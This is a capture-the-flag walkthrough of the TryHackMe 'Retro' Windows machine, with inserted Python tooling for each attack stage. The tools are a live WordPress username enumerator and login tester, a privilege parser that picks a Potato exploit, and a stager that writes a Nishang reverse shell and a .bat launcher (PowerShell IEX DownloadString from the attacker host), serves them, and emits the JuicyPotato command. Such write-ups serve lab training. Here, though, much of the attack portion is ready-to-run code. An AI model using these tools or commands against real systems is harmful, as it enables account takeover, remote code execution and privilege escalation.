TryHackMe WalkThrough — Retro
During my journey to finish the Offensive Pentesting path on TryHackMe, I had to hack several machines. This walkthrough is for Retro, a Windows-based machine.
All flags and hashes will be redacted in order to prevent an easy win of the room. You can find the room here.
Enumeration
The task description warns us that the machine doesn't respond to ICMP requests. By default nmap pings a host before scanning it and skips hosts that don't answer, so we pass -Pn to skip host discovery and scan the target regardless:
As we can see, the machine name is RETROWEB and we have 2 ports open:
- Port 80 — Web server running IIS
- Port 3389 — RDP access
As usual, I add an entry to /etc/hosts and use the machine's name instead of the IP address whenever possible:
echo "10.10.13.117 retroweb" | sudo tee -a /etc/hosts
Let’s check if we can find any web page on the target:
We get the default IIS welcome page, so it is time to run gobuster and see what hidden directories exist on the server:
We can now answer the question “A web server is running on the target. What is the hidden directory which the website lives on?” with “/retro”.
By having a look into the site, we can see it is some kind of blog related to retro games, books and movies:
Wappalyzer reports that the site is running WordPress version 5.2.1:
A second gobuster run against the /retro directory finds another set of WordPress-related directories:
So let’s head to the wp-login.php page and see if we can find some credentials:
On a default WordPress login page the error message differs depending on whether the username exists ("Invalid username") or only the password is wrong ("The password you entered for the username X is incorrect"), so valid usernames can be enumerated by hand. The same form can also be brute-forced with a tool such as Hydra. Usually I try not to brute-force login pages unless I have been stuck on a machine for a while (although sometimes it is the intended path).
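The enumeration described above, as an added example that is not part of the original walkthrough: the classifier keys on the stock WordPress error fragments, the HTTP call is injected so the logic runs offline against a constructed stand-in site (one account, wade:parzival), and make_http_poster() builds the same callable for a live target. The login URL, the probe password and the fake site's HTML are assumptions, not taken from the page.

```python
import re
import urllib.error
import urllib.parse
import urllib.request


def classify_login(status, headers, body):
    """Classify one POST to wp-login.php as 'success', 'valid_user',
    'invalid_user' or 'unknown'.

    WordPress's stock error text differs for the two failure cases, which is
    what makes username enumeration possible:
      'Invalid username' / 'Invalid email address'        -> no such account
      'The password you entered for the ... is incorrect'  -> account exists
    A successful login answers with a redirect that sets a
    wordpress_logged_in_* cookie.  `headers` is a dict; join several
    Set-Cookie headers into one string before passing them in.
    """
    set_cookie = " ".join(v for k, v in headers.items() if k.lower() == "set-cookie")
    if status in (301, 302, 303) and "wordpress_logged_in_" in set_cookie:
        return "success"
    if "Invalid username" in body or "Invalid email address" in body:
        return "invalid_user"
    if re.search(r"The password you entered for the (username|email address) "
                 r".*? is incorrect", body):
        return "valid_user"
    return "unknown"


def enumerate_users(candidates, post_login, probe_password="notthepassword"):
    """Return the candidates the site confirms exist.  post_login(user, pw)
    must return (status, headers, body); it is injected so this runs offline."""
    return [u for u in candidates
            if classify_login(*post_login(u, probe_password)) in ("valid_user", "success")]


def make_http_poster(login_url):
    """Build a post_login() for a live target (assumed URL such as
    http://retroweb/retro/wp-login.php).  Redirects are not followed so the
    302 of a successful login reaches classify_login unchanged."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None

    opener = urllib.request.build_opener(NoRedirect)

    def post_login(user, pw):
        form = urllib.parse.urlencode({"log": user, "pwd": pw, "wp-submit": "Log In",
                                       "redirect_to": login_url, "testcookie": "1"})
        req = urllib.request.Request(
            login_url, data=form.encode(),
            # wp-login.php refuses logins when its test cookie is missing.
            headers={"Cookie": "wordpress_test_cookie=WP+Cookie+check"})
        try:
            resp = opener.open(req, timeout=10)
        except urllib.error.HTTPError as err:  # raised for the unfollowed 302
            resp = err
        headers = {"Set-Cookie": "; ".join(resp.headers.get_all("Set-Cookie") or [])}
        return resp.getcode(), headers, resp.read().decode("utf-8", "replace")

    return post_login


def fake_site(user, pw):
    """Constructed stand-in for the target with a single account wade:parzival,
    answering with the fragments WordPress 5.x puts into the login page."""
    accounts = {"wade": "parzival"}
    if user not in accounts:
        return 200, {}, ('<div id="login_error"><strong>ERROR</strong>: Invalid username. '
                         '<a href="/retro/wp-login.php?action=lostpassword">Lost your password?</a></div>')
    if accounts[user] != pw:
        return 200, {}, ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                         f'for the username <strong>{user}</strong> is incorrect.</div>')
    return 302, {"Set-Cookie": "wordpress_logged_in_1a2b=wade%7C1; path=/retro/; HttpOnly"}, ""


if __name__ == "__main__":
    print(enumerate_users(["admin", "wade", "editor"], fake_site))   # ['wade']
    print(classify_login(*fake_site("wade", "parzival")))             # success
```

Against a real target, swap fake_site for make_http_poster("http://retroweb/retro/wp-login.php"); every probe is a failed login in the web server log, so keep the candidate list short.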
After trying the default username and password without luck, I decided to head to the blog looking for clues, and found a post that could give us a way in:
In the post, 'Wade' mentions that this is his favourite book of all time, especially because he shares his name with the main protagonist. In the book and film (Ready Player One), Wade's avatar is 'Parzival', so let's try the 'wade':'parzival' combination as credentials:
At this point I remember that the RDP port is open, so let's try the same credentials there (with an RDP client such as xfreerdp) before doing anything else in WordPress:
After logging in we find user.txt on the Desktop and get the first flag. We can now answer the question "user.txt" with the newly found flag.
Privilege Escalation
Let's begin by checking systeminfo, and the groups and privileges (whoami /priv) of the 'wade' user:
If the machine is Windows 10 version 1809 or newer, or Windows Server 2019 or newer, the DCOM trick that Juicy Potato relies on has been fixed and we need something like Rogue Potato (or PrintSpoofer) instead; on older builds, such as Server 2016, Juicy Potato still works. I am not going to go into the details of this family of attacks, but all of them need a low-privilege account that holds one of the following privileges:
- 'SeImpersonatePrivilege'
- 'SeAssignPrimaryTokenPrivilege'
From the output we see that the machine is running Windows Server 2016 and that wade holds neither privilege, so we cannot use a Potato attack to get from this account to SYSTEM.
After a while of enumerating services and programs, I remembered that we still have WordPress access: the account running the web server may be a different one, with different privileges.
We start by logging into WordPress and putting a reverse shell into one of the theme's page templates through the theme editor, which requires an administrator account (you can set up a reverse shell for Windows/PHP like this):
Don't forget to change the IP address and port to the ones you are going to use (the IP address is the one assigned to your TryHackMe VPN interface, tun0). After saving the file, start a netcat listener on our machine before loading the edited page:
After refreshing the page, we should have our reverse shell popping up in our machine:
Let's start by checking which user this is and what privileges it holds (whoami /priv):
As we can see, the user retro holds 'SeImpersonatePrivilege', which is what we need to get to SYSTEM, so let's try a Juicy Potato attack from this shell.
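The check made twice above (wade lacks the Potato privileges, retro holds SeImpersonatePrivilege, and the OS build decides Juicy vs. Rogue Potato) as one added example, not code from the original walkthrough: it parses `whoami /priv` and `systeminfo` output and says whether a Potato-family escalation is worth attempting and which tool fits the build. The two privilege listings and the systeminfo excerpt are constructed samples modelled on the page, not the room's actual output, and the retro sample assumes only SeImpersonatePrivilege is held.

```python
import re

# Every Potato-style attack needs the foothold to hold one of these.
POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")
# Windows 10 1809 and Windows Server 2019 are build 17763; from that build on
# the DCOM/OXID trick JuicyPotato depends on is fixed, so newer targets need
# RoguePotato or PrintSpoofer instead.
LAST_JUICY_BUILD = 17762


def parse_privileges(whoami_priv_output):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` text."""
    privs = {}
    for line in whoami_priv_output.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_build(systeminfo_output):
    """Return the build number from the 'OS Version:' line of `systeminfo`, or None."""
    m = re.search(r"^OS Version:\s+\d+\.\d+\.(\d+)", systeminfo_output, re.MULTILINE)
    return int(m.group(1)) if m else None


def assess_potato(whoami_priv_output, systeminfo_output):
    """Decide whether, and with which tool, a Potato escalation is worth trying.

    'Disabled' only means the privilege is not currently enabled in the token;
    the process can enable it itself, so it still counts.  A privilege that is
    missing from the list cannot be acquired at all."""
    privs = parse_privileges(whoami_priv_output)
    held = [p for p in POTATO_PRIVS if p in privs]
    build = parse_build(systeminfo_output)
    if not held:
        tool = None
    elif build is None:
        tool = "unknown build: check the OS version first"
    elif build <= LAST_JUICY_BUILD:
        tool = "JuicyPotato"
    else:
        tool = "RoguePotato or PrintSpoofer"
    return {"viable": bool(held), "held": held, "build": build, "tool": tool}


# Constructed samples (not the room's real output) in the layout whoami /priv
# and systeminfo use.
WADE_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""

RETRO_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

SYSTEMINFO = """
Host Name:                 RETROWEB
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
"""

if __name__ == "__main__":
    print(assess_potato(WADE_PRIV, SYSTEMINFO))   # viable False, tool None
    print(assess_potato(RETRO_PRIV, SYSTEMINFO))  # viable True, tool JuicyPotato
```

Paste the real `whoami /priv` and `systeminfo` output from the shell into the two string arguments; the parser ignores the header and separator lines.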
I tend to make a directory for my attack files, mainly because it is easier to clean up afterwards if needed. So let's make a temp directory in C:\:
cd C:\
mkdir temp
cd temp
First we need to download the exploit. We can get the latest version here. After downloading it to our machine we need to transfer it to the server: we open a Python HTTP server on our side and download it from the other side with PowerShell.
On our machine we run the http.server module from the directory holding the exploit (port 80 needs root, hence sudo):
sudo python3 -m http.server 80
And we should be able to access our web server using our IP address:
Now we head to the server, start PowerShell and get the exploit into our newly created directory with the following command (the rest of this walkthrough assumes it was saved as j.exe):
Invoke-WebRequest <resource_to_download> -OutFile <output_file_name>
After downloading the exploit, let's check that it runs on the machine:
Perfect! JuicyPotato lets us launch an executable as a SYSTEM-level process, so we also need something for it to run. In this case another reverse shell will do, which will give us a SYSTEM shell on our side.
We can create one with msfvenom or download one made for this case, such as the Nishang reverse shell from here.
So let's download Invoke-PowerShellTcp.ps1 from the Shells directory and save it on our machine. The script only defines the function, so we append a line at the end of the file that actually calls it, replacing the IP and port with our own:
Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>
Now let's get our reverse shell onto the server using the same procedure:
We still need something executable for JuicyPotato to launch, which in turn runs our reverse shell and gives us a SYSTEM shell on our side. Let's create a .bat file with the following line, replacing the IP with our own, and transfer it to the server using the same method:
PowerShell "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/rshell.ps1')"
Now we download it to the server using Invoke-WebRequest:
Then we open a netcat listener on our side, on a different port than the one used by the shell we are currently in (the port we put in the Invoke-PowerShellTcp line):
The flow of this attack is something like this:
- The JuicyPotato exploit runs the .bat file as SYSTEM
- The .bat file with SYSTEM privileges downloads our Nishang reverse shell and executes it
- We get a SYSTEM shell on our side by using a netcat listener
So let's run the attack and see if we get a SYSTEM shell on our side. JuicyPotato is invoked like this: -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -p is the program to launch, and -l is a free local port on the target for JuicyPotato's own COM listener (it has nothing to do with our netcat port). If the default CLSID does not work on the target, another one can be passed with -c.
.\j.exe -t * -p <path_to_executable.bat> -l 9002
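The staging side of the chain just described (Nishang script with the invoke line appended, the .bat launcher, the HTTP server that hands both to the target) as an added example, not code from the original walkthrough. It runs on the attacker machine, validates the IP and ports before anything is served, and records every request the target makes, so the GET for rshell.ps1 in the hit log shows that JuicyPotato actually ran the launcher as SYSTEM even before a shell arrives (or that it never did). The file names launcher.bat and rshell.ps1, the path C:\temp\launcher.bat, the exploit name j.exe and port 9002 are assumptions taken over from the commands above; the Nishang stub in the self-test stands in for the real Invoke-PowerShellTcp.ps1.

```python
import functools
import http.server
import ipaddress
import os
import threading


def write_stage(stage_dir, attacker_ip, shell_port, nishang_src, http_port=80):
    """Write rshell.ps1 and launcher.bat into stage_dir.

    nishang_src is the text of Nishang's Invoke-PowerShellTcp.ps1, fetched
    separately; it only defines the function, so the call that connects back
    is appended here.  Returns the JuicyPotato command line for the target
    (assumes the exploit was saved as j.exe in C:\\temp and 9002 is free)."""
    ipaddress.ip_address(attacker_ip)     # fail on a typo before anything is served
    if shell_port == http_port:
        raise ValueError("reverse-shell port must differ from the HTTP port")
    os.makedirs(stage_dir, exist_ok=True)
    host = attacker_ip if http_port == 80 else f"{attacker_ip}:{http_port}"
    ps1 = (nishang_src.rstrip("\n")
           + f"\nInvoke-PowerShellTcp -Reverse -IPAddress {attacker_ip} -Port {shell_port}\n")
    # The launcher is what JuicyPotato runs as SYSTEM; it pulls and runs rshell.ps1.
    bat = (f"PowerShell \"IEX(New-Object Net.WebClient)"
           f".DownloadString('http://{host}/rshell.ps1')\"\r\n")
    with open(os.path.join(stage_dir, "rshell.ps1"), "w", newline="") as f:
        f.write(ps1)
    with open(os.path.join(stage_dir, "launcher.bat"), "w", newline="") as f:
        f.write(bat)                       # newline="" keeps the CRLF for cmd.exe
    return r".\j.exe -t * -p C:\temp\launcher.bat -l 9002"


class HitLoggingHandler(http.server.SimpleHTTPRequestHandler):
    """Static file server that records (client, path) of every request on
    server.hits, on top of the usual console log line."""

    def log_message(self, fmt, *args):
        self.server.hits.append((self.client_address[0], self.path))
        super().log_message(fmt, *args)


def serve_stage(stage_dir, bind="0.0.0.0", port=80):
    """Serve stage_dir in a background thread and return the server object.
    Binding port 80 needs root, exactly like `python3 -m http.server 80`."""
    handler = functools.partial(HitLoggingHandler, directory=stage_dir)
    server = http.server.ThreadingHTTPServer((bind, port), handler)
    server.hits = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def local_selftest():
    """Offline run-through on 127.0.0.1 with a stub in place of the Nishang
    script; returns (launcher text, rshell text, recorded hits, command)."""
    import tempfile
    import urllib.request
    stub = "function Invoke-PowerShellTcp { param($IPAddress, $Port, [switch]$Reverse) }\n"
    with tempfile.TemporaryDirectory() as d:
        cmd = write_stage(d, "127.0.0.1", 4444, stub, http_port=8000)
        server = serve_stage(d, bind="127.0.0.1", port=0)   # port 0: any free port
        try:
            port = server.server_address[1]
            bat = urllib.request.urlopen(f"http://127.0.0.1:{port}/launcher.bat", timeout=5).read().decode()
            ps1 = urllib.request.urlopen(f"http://127.0.0.1:{port}/rshell.ps1", timeout=5).read().decode()
        finally:
            server.shutdown()
            server.server_close()
        return bat, ps1, list(server.hits), cmd


if __name__ == "__main__":
    bat, ps1, hits, cmd = local_selftest()
    print(bat.strip())
    print(hits)       # [('127.0.0.1', '/launcher.bat'), ('127.0.0.1', '/rshell.ps1')]
    print(cmd)
```

In a real run, call write_stage() with your tun0 address and the netcat port, serve_stage() on port 80, and watch server.hits: a GET for /launcher.bat comes from your own Invoke-WebRequest, while a GET for /rshell.ps1 can only come from the launcher having been executed.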
Now we can just head to the Administrator Desktop and grab our root flag!
We can now answer the question “root.txt” with the new found root flag.
Overall, this machine was fun to solve. It is classified as a hard machine, but I think it is more of a medium difficulty.
I hope you enjoyed reading this post as much as I enjoyed writing it. Let me know in the comments if something is wrong or missing, as I am still learning myself and feedback is always welcomed :)